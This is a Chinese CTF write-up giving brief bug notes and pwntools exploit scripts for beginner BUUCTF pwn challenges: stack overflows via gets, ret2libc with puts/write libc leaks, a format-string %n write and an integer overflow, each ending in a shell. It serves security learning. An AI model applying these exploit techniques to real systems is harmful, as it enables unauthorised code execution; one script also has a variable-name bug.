BUUCTF pwn水题大赏
test_your_nc
就 nc
上去,然后 cat flag
rip
gets
栈溢出到 /bin/sh
exp:
from pwn import*
#p=process('./pwn1')
p=remote('node3.buuoj.cn',25250)
payload='a'*0xf+'a'*8+p64(0x40118a)
p.sendline(payload)
p.interactive()
warmup_csaw_2016
gets
栈溢出到 sub_40060D
exp:
from pwn import*
p=process('./warmup_csaw_2016')
#p=remote('node3.buuoj.cn',27740)
payload='a'*0x48+p64(0x40060d)
p.sendline(payload)
p.interactive()
pwn1_sctf_2016
c++题目,当输入 i
时会被替换成 you
,输入 20
个i
就可以溢出到 get_flag
exp:
from pwn import *
p=process('./pwn1_sctf_2016')
#p=remote('node3.buuoj.cn',)
payload='I'*20+'a'*4+p64(0x08048F0D)
p.sendline(payload)
p.interactive()
ciscn_2019_n_1
gets
栈溢出绕过 if
exp:
from pwn import*
p=process('./ciscn_2019_n_1')
#p=remote('node3.buuoj.cn',27504)
payload='a'*0x30+'a'*8+p64(0x4006be)
p.sendline(payload)
p.interactive()
jarvisoj_level0
栈溢出到 callsystem
函数(要用 ret
将栈对齐)
exp:
from pwn import*
p=process('./level0')
#p=remote('node3.buuoj.cn',29842)
ret = 0x0000000000400431
payload='a'*0x88+p64(ret)+p64(0x0400596)
p.sendline(payload)
p.interactive()
ciscn_2019_c_1
puts
泄露 libc
,gets
栈溢出
exp:
from pwn import*
p=process('./ciscn_2019_c_1')
#p=remote('node3.buuoj.cn',28840)
context.log_level = 'debug'
ret=0x00000000004006b9
pop_rdi=0x0000000000400c83
elf=ELF('./ciscn_2019_c_1')
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
main_plt = elf.sym['main']
payload='a'*0x50+'a'*8+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(main_plt)
p.sendlineafter("choice!",'1')
p.sendline(payload)
puts_addr=u64(p.recvuntil('\x7f')[-6:].ljust(8, '\x00'))
print hex(puts_addr)
libc_base=puts_addr-0x080a30
print hex(libc_base)
libc_sys=libc_base+0x04f4e0
libc_sh=libc_base+0x1b40fa
p.sendlineafter("choice!",'1')
payload2='a'*0x50+'a'*8+p64(ret)+p64(pop_rdi)+p64(libc_sh)+p64(libc_sys)+p64(0)
p.sendline(payload2)
p.interactive()
[OGeek2019]babyrop
write
泄露 libc
,\x00
绕过 strncmp
exp:
from pwn import*
from LibcSearcher import*
p=process('./pwn')
#p=remote('node3.buuoj.cn',28116)
elf=ELF('./pwn')
write_plt=elf.plt['write']
read_got=elf.got['read']
read_plt=elf.plt['read']
main_addr=0x8048825
payload1='\x00'+'\xff'*0x7
p.sendline(payload1)
p.recvuntil('Correct')
payload2='a'*0xe7+'b'*0x4+p32(write_plt)+p32(main_addr)+p32(1)+p32(read_got)+p32(0x8)
p.sendline(payload2)
read_addr=u32(r.recv(4))
print hex(read_addr)
libc=LibcSearcher('read',read_addr)
libc_base=read_addr-libc.dump('read')
system_addr=libc_base+libc.dump('system')
bin_sh_addr=libc_base+libc.dump('str_bin_sh')
p.sendline(payload1)
p.recvuntil('Correct')
payload3='a'*0xe7+'b'*0x4+p32(system_addr)*2+p32(bin_sh_addr)
p.sendline(payload3)
p.interactive()
[第五空间2019 决赛]PWN5
格式化字符串,偏移 10
,将 unk_804C044
改成固定数值
exp:
from pwn import*
p=process('./pwn5')
#p=remote("node3.buuoj.cn",25955)
unk_804C044=0x0804C044
payload=p32(unk_804C044)+'%10$n'
p.sendlineafter('your name:',payload)
p.sendlineafter('your passwd:','4')
p.interactive()
[BJDCTF 2nd]r2t3
整数溢出
exp:
from pwn import*
p=process('./r2t3')
#p=remote('node3.buuoj.cn',28250)
p.recvuntil("name:")
payload=(0x11+0x4)*'a'+p32(0x0804858B)+'a'*235
p.sendline(payload)
p.interactive()